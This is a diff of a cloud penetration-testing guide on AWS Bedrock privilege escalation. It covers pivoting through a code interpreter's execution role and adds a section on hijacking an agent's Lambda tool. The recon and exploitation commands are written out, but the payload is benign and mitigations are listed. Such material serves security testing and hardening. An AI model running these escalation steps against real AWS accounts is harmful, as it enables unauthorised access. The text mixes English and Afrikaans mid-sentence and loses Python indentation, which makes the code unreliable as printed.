diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
index 3fad9af22..018e5d0d0 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -6,32 +6,32 @@
 
 ### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
 
-AgentCore Code Interpreter is 'n bestuurde uitvoeringsomgewing. **Custom Code Interpreters** kan gekonfigureer word met 'n **`executionRoleArn`** wat “toestemmings verskaf vir die code interpreter om toegang tot AWS services te kry”.
+AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”.
 
-Indien 'n **lower-privileged IAM principal** 'n Code Interpreter-sessie kan **start + invoke** wat gekonfigureer is met 'n **more privileged execution role**, kan die oproeper effektief **pivot into the execution role’s permissions** (lateral movement / privilege escalation, afhangende van die rol se omvang).
+If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope).
 
 > [!NOTE]
-> Dit is gewoonlik 'n **misconfiguration / excessive permissions**-kwessie (om wye toegangsregte aan die interpreter execution role te verleen en/of breë invoke-toegang te gee).
-> AWS waarsku uitdruklik om privilege escalation te vermy deur te verseker dat execution roles **equal or fewer** privileges het as die identiteite wat toegelaat word om te invoke.
+> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access).
+> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.
 
-#### Voorvereistes (algemene miskonfigurasie)
+#### Preconditions (common misconfiguration)
 
-- 'n **custom code interpreter** bestaan met 'n oor-privilegieerde **execution role** (bv.: toegang tot sensitiewe S3/Secrets/SSM of IAM-admin-agtige bevoegdhede).
-- 'n gebruiker (developer/auditor/CI identity) het permissies om:
-  - start sessies: `bedrock-agentcore:StartCodeInterpreterSession`
-  - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
-- (Opsioneel) Die gebruiker kan ook interpreters skep: `bedrock-agentcore:CreateCodeInterpreter` (stel hulle in staat om 'n nuwe interpreter te skep wat gekonfigureer is met 'n execution role, afhangende van org guardrails).
+- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
+- A user (developer/auditor/CI identity) has permissions to:
+- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
+- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
+- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (laat hulle toe om 'n nuwe interpreter te skep wat met 'n execution role gekonfigureer is, afhangend van org guardrails).
 
-#### Recon (identify custom interpreters and execution role usage)
+#### Rekonnaissance (identifiseer custom interpreters en execution role usage)
 
-Lys interpreters (control-plane) en ondersoek hul konfigurasie:
+Lys interpreters (control-plane) en inspekteer hul konfigurasie:
 ```bash
 aws bedrock-agentcore-control list-code-interpreters
 aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
-````
-> Die create-code-interpreter command ondersteun `--execution-role-arn`, wat bepaal watter AWS-toestemmings die interpreter sal hê.
+```
+> Die create-code-interpreter command ondersteun `--execution-role-arn` wat definieer watter AWS permissions die interpreter sal hê.
 
-#### Stap 1 - Begin 'n sessie (dit gee `sessionId` terug, nie 'n interaktiewe shell nie)
+#### Stap 1 - Begin 'n session (dit gee 'n `sessionId` terug, nie 'n interaktiewe shell nie)
 ```bash
 SESSION_ID=$(
 aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
 
 echo "SessionId: $SESSION_ID"
 ```
-#### Stap 2 - Roep kode-uitvoering aan (Boto3 of signed HTTPS)
+#### Stap 2 - Invoke code execution (Boto3 of getekende HTTPS)
 
-Daar is **geen interaktiewe python shell** vanaf `start-code-interpreter-session`. Uitvoering gebeur via **InvokeCodeInterpreter**.
+Daar is **geen interaktiewe python shell** vanaf `start-code-interpreter-session`. Execution gebeur via **InvokeCodeInterpreter**.
 
-**Opsie A - Boto3 voorbeeld (voer Python uit + verifieer identiteit):**
+**Opsie A - Boto3 voorbeeld (execute Python + verify identity):**
 ```python
 import boto3
 
@@ -68,9 +68,9 @@ arguments={
 for event in resp.get("stream", []):
 print(event)
 ```
-As die interpreter gekonfigureer is met 'n execution role, behoort die `sts:GetCallerIdentity()` uitset daardie rol se identiteit te weerspieël (nie die low-priv caller nie), wat die pivot aandui.
+As die interpreter gekonfigureer is met ’n execution role, moet die `sts:GetCallerIdentity()`-uitset daardie role se identiteit weerspieël (nie die lae-priv caller nie), wat die pivot demonstreer.
 
-**Opsie B - Ondertekende HTTPS-oproep (awscurl):**
+**Opsie B - Signed HTTPS call (awscurl):**
 ```bash
 awscurl -X POST \
 "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -89,18 +89,86 @@ awscurl -X POST \
 ```
 #### Impak
 
-* **Lateral movement** na watter AWS-toegang die interpreter execution role ook al het.
-* **Privilege escalation** indien die interpreter execution role meer voorregte het as die caller.
-* Moeilikere opsporing indien CloudTrail data events vir interpreter invocations nie geaktiveer is nie (invocations mag nie standaard gelog word nie, afhangend van die konfigurasie).
+* **Laterale beweging** na enige AWS-toegang wat die interpreter execution role het.
+* **Privilege escalation** as die interpreter execution role meer geprivilege is as die caller.
+* Moeiliker opsporing as CloudTrail data events vir interpreter invocations nie geaktiveer is nie (invocations mag dalk nie by verstek gelog word nie, afhangende van konfigurasie).
 
-#### Versagtingsmaatreëls / Hardening
+#### Mitigations / Hardening
 
 * **Least privilege** op die interpreter `executionRoleArn` (behandel dit soos Lambda execution roles / CI roles).
-* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) en wie sessies kan begin.
-* Gebruik **SCPs** om InvokeCodeInterpreter te weier behalwe vir goedgekeurde agent runtime roles (org-level enforcement kan nodig wees).
-* Skakel toepaslike **CloudTrail data events** vir AgentCore in waar van toepassing; waarsku op onverwagte invocations en sessie-creation.
+* **Beperk wie kan invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) en wie sessions kan begin.
+* Gebruik **SCPs** om InvokeCodeInterpreter te deny behalwe vir goedgekeurde agent runtime roles (org-level enforcement kan nodig wees).
+* Aktiveer toepaslike **CloudTrail data events** vir AgentCore waar van toepassing; alert op onverwachte invocations en session creation.
 
-## References
+## Amazon Bedrock Agents
+
+### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
+
+Bedrock Agents kan **Lambda-backed action groups** as tools gebruik (external execution). As 'n principal die **code van 'n Lambda function wat deur 'n agent gebruik word, kan modify**, en dan die **agent kan invoke**, kan hulle attacker-controlled code uitvoer onder die **Lambda execution role**.
+
+> [!NOTE]
+> Dit is 'n **cross-service trust abuse** (Bedrock → Lambda), nie 'n vulnerability nie. Die attacker mag dalk nie die Lambda direk kan invoke nie, maar kan dit steeds via die agent trigger.
+
+#### Preconditions (common misconfiguration)
+
+- 'n Bedrock Agent bestaan met 'n **action group backed by a Lambda function**
+- Die attacker het:
+- `lambda:UpdateFunctionCode`
+- `bedrock:InvokeAgent`
+- Die Lambda execution role het breër permissions as die attacker
+- Die attacker kan die Lambda identifiseer wat deur die agent gebruik word
+
+#### Recon
+
+Inventory agent action groups:
+```bash
+aws bedrock-agent list-agents
+aws bedrock-agent get-agent --agent-id <AGENT_ID>
+aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
+```
+Inspekteer Lambda:
+```bash
+aws lambda get-function --function-name <FUNCTION_NAME>
+```
+#### Exploitation
+
+Vervang Lambda-kode:
+```bash
+zip payload.zip lambda_function.py
+
+aws lambda update-function-code \
+--function-name <FUNCTION_NAME> \
+--zip-file fileb://payload.zip
+```
+Voorbeeld payload:
+```python
+import boto3
+
+def lambda_handler(event, context):
+return boto3.client("sts").get_caller_identity()
+```
+Trigger via agent:
+```bash
+aws bedrock-agent-runtime invoke-agent \
+--agent-id <AGENT_ID> \
+--agent-alias-id <ALIAS_ID> \
+--session-id test \
+--input-text "trigger tool"
+```
+#### Impak
+
+* **Privilege escalation** na Lambda execution role
+* **Data exfiltration** vanaf AWS services
+* **Cross-service abuse** via trusted agent execution
+
+#### Mitigasies
+
+* **Restrict** `lambda:UpdateFunctionCode`
+* Gebruik **least-privilege** Lambda roles
+* **Monitor** Lambda code changes
+* **Audit** Bedrock agent tool usage
+
+## Verwysings
 
 - [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
 - [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
@@ -108,6 +176,7 @@ awscurl -X POST \
 - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
 - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
 - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
 
 
 {{#include ../../../../banners/hacktricks-training.md}}